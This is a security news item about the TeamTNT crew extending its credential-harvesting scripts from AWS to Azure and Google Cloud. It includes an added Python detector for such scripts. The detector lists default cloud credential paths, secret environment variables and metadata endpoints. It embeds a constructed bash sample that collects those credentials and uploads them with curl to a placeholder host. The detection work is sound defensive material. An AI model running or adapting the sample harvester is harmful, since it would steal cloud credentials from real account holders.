Security News > 2023 > July > Infosec watchers: TeamTNT crew may blast holes in Azure, Google Cloud users
A criminal crew with a history of deploying malware to harvest credentials from Amazon Web Services accounts may expand its attention to organizations using Microsoft Azure and Google Cloud Platform.
The crooks primarily targeted AWS users, and now appear to be looking for ways into Azure and Google Cloud accounts as well.
According to a write-up last year from Elastic Security Labs, 33 percent of cloud attacks involve stolen credentials, a technique TeamTNT is known for.
The script updates analyzed by SentinelLabs and Permiso add support for harvesting Azure and Google Cloud credentials, make the scripts more modular so they can chain more complex attacks, improve the credential harvesting itself, and use the curl command-line tool to exfiltrate the stolen data.
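The pattern described above, credential files and metadata endpoints read from disk and then shipped out with curl, is something a responder can triage statically from a captured script. The following is an added example for this page, not TeamTNT's code and not from the SentinelLabs, Permiso or Aqua reports: it scans a shell script for the well-known default credential locations of AWS, Azure and GCP, for credential-bearing environment variables, for instance metadata reads, and for curl invocations that upload data to a non-local host. The sample script it runs on is constructed to mimic that pattern and is labelled as such; the host `example.invalid` is a placeholder.

```python
"""Static triage of a captured shell script for cloud-credential harvesting and curl exfiltration.

Added example; not TeamTNT's tooling. The SAMPLE_SCRIPT below is constructed for this
example and only imitates the described pattern (read credential files, query metadata,
upload with curl). Credential paths are the providers' documented default locations.
"""
import re
from dataclasses import dataclass

# Default on-disk credential locations for the three clouds named in the article.
CREDENTIAL_FILES = {
    "aws": [r"\.aws/credentials", r"\.aws/config"],
    "azure": [r"\.azure/accessTokens\.json", r"\.azure/msal_token_cache\.json",
              r"\.azure/azureProfile\.json"],
    "gcp": [r"\.config/gcloud/credentials\.db",
            r"\.config/gcloud/application_default_credentials\.json",
            r"\.config/gcloud/legacy_credentials"],
}
# Environment variables that hold secrets or point at a key file.
CREDENTIAL_ENV = {
    "aws": [r"AWS_SECRET_ACCESS_KEY", r"AWS_SESSION_TOKEN", r"AWS_"],
    "azure": [r"AZURE_CLIENT_SECRET", r"AZURE_"],
    "gcp": [r"GOOGLE_APPLICATION_CREDENTIALS"],
}
# Instance metadata services; all three live on link-local addresses, distinguished by path/host.
METADATA = {
    "aws": r"169\.254\.169\.254/latest/",
    "azure": r"169\.254\.169\.254/metadata/",
    "gcp": r"metadata\.google\.internal|169\.254\.169\.254/computeMetadata",
}
# curl with a flag that sends data: the shapes a harvester uses to ship its loot.
UPLOAD_FLAG = re.compile(
    r"\bcurl\b[^|;&\n]*?(?:\s-d\s|\s--data(?:-binary|-raw|-urlencode)?\s|\s-F\s|\s--form\s"
    r"|\s-T\s|\s--upload-file\s|\s-X\s+(?:POST|PUT)\b)")
URL_HOST = re.compile(r"https?://([^/\s'\"]+)")
# Metadata and loopback hosts are never exfiltration targets (IMDSv2 itself uses -X PUT).
LOCAL_HOST = re.compile(r"^(169\.254\.169\.254|metadata\.google\.internal|localhost|127\.)")


@dataclass(frozen=True)
class Finding:
    line_no: int
    provider: str   # aws / azure / gcp / external
    kind: str       # credential_file / credential_env / metadata / exfil
    evidence: str   # the offending line, or the destination host for exfil


def triage_script(script: str) -> list[Finding]:
    """Return one Finding per suspicious line/pattern pair in a shell script."""
    findings: list[Finding] = []
    for n, raw in enumerate(script.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for prov, pats in CREDENTIAL_FILES.items():
            if any(re.search(p, line) for p in pats):
                findings.append(Finding(n, prov, "credential_file", line))
        for prov, pats in CREDENTIAL_ENV.items():
            if any(re.search(p, line) for p in pats):
                findings.append(Finding(n, prov, "credential_env", line))
        for prov, pat in METADATA.items():
            if re.search(pat, line):
                findings.append(Finding(n, prov, "metadata", line))
        if UPLOAD_FLAG.search(line):
            for host in URL_HOST.findall(line):
                if not LOCAL_HOST.match(host):
                    findings.append(Finding(n, "external", "exfil", host))
    return findings


def verdict(findings: list[Finding]) -> dict:
    """Harvester = touches at least one provider's credentials AND uploads somewhere external."""
    providers = sorted({f.provider for f in findings if f.provider != "external"})
    exfil = any(f.kind == "exfil" for f in findings)
    return {"providers": providers, "exfil": exfil, "harvester": bool(providers) and exfil}


# CONSTRUCTED sample input for this example: imitates the described pattern, not real malware.
SAMPLE_SCRIPT = """\
#!/bin/bash
# constructed sample: collects local cloud creds and posts them out
OUT=/tmp/.c
mkdir -p "$OUT"
cat ~/.aws/credentials > "$OUT/aws" 2>/dev/null
cp ~/.azure/msal_token_cache.json "$OUT/" 2>/dev/null
cp ~/.config/gcloud/application_default_credentials.json "$OUT/" 2>/dev/null
env | grep -E 'AWS_|AZURE_|GOOGLE_APPLICATION_CREDENTIALS' >> "$OUT/env"
curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token >> "$OUT/gcp_token"
tar czf /tmp/.c.tgz "$OUT"
curl -s -X POST --data-binary @/tmp/.c.tgz http://example.invalid/upload
"""

if __name__ == "__main__":
    hits = triage_script(SAMPLE_SCRIPT)
    for f in hits:
        print(f"line {f.line_no:2d} {f.provider:8s} {f.kind:16s} {f.evidence}")
    print(verdict(hits))
```

The metadata read on the GCP endpoint is reported as a metadata finding but not as exfiltration, because the destination is link-local; only the final curl, which uploads the archive to an external host, is classed as exfil. The same split lets the check stay quiet on legitimate IMDSv2 token requests (`curl -X PUT http://169.254.169.254/...`).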
The work by SentinelLabs and Permiso echoes what Aqua uncovered earlier this month in connection with a "Potentially massive campaign against cloud native environments" that researchers Ofek Itach and Assaf Morag laid at the feet of TeamTNT or a group using the same techniques.
They described the Silentbob campaign as an "Aggressive cloud worm, designed to deploy on exposed JupyterLab and Docker APIs in order to deploy Tsunami malware, cloud credentials hijack, resource hijack and further infestation of the worm."
News URL
https://go.theregister.com/feed/www.theregister.com/2023/07/15/teamtnt_aws_azure_google/